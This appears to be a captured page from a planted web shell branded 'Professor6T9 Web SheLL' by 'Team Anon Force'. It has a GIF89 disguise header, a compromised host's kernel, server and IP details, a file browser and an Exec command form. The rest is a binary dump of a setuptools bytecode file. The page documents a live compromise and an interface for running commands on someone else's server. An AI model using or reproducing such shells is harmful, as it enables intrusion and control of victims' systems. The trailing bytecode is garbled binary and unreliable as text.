GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python311
/
lib
/
python3.11
/
site-packages
/
setuptools
/
__pycache__
[ HOME ]
Exec
Submit
wheel.cpython-311.pyc
� ,�Re� � � � d Z ddlZddlZddlZddlZddlZddlZddlZddlm Z ddl Z ddlZddl mZ ddl mZ ddlmZ ddlmZ ddlmZ ej d ej � � j Zd Zd� Zej d� � � Z G d � d� � ZdS )zWheels support.� N)�get_platform)� parse_version)�sys_tags)�canonicalize_name)�write_requirements)�_unpack_zipfile_objz�^(?P<project_name>.+?)-(?P<version>\d.*?) ((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?) )\.whl$z8__import__('pkg_resources').declare_namespace(__name__) c �� � t j | � � D �])\ }}}t j � || � � }|D ]X}t j � ||� � }t j � |||� � }t j ||� � �Yt t t |� � � � � � D ]}\ } } t j � || � � }t j � ||| � � }t j � |� � st j ||� � || = �~��+t j | d�� � D ]\ }}}|rJ �t j |� � �dS )zDMove everything under `src_dir` to `dst_dir`, and delete the former.T)�topdownN)�os�walk�path�relpath�join�renames�reversed�list� enumerate�exists�rmdir)�src_dir�dst_dir�dirpath�dirnames� filenames�subdir�f�src�dst�n�ds ��/builddir/build/BUILDROOT/alt-python311-setuptools-65.6.3-2.el8.x86_64/opt/alt/python311/lib/python3.11/site-packages/setuptools/wheel.py�unpackr"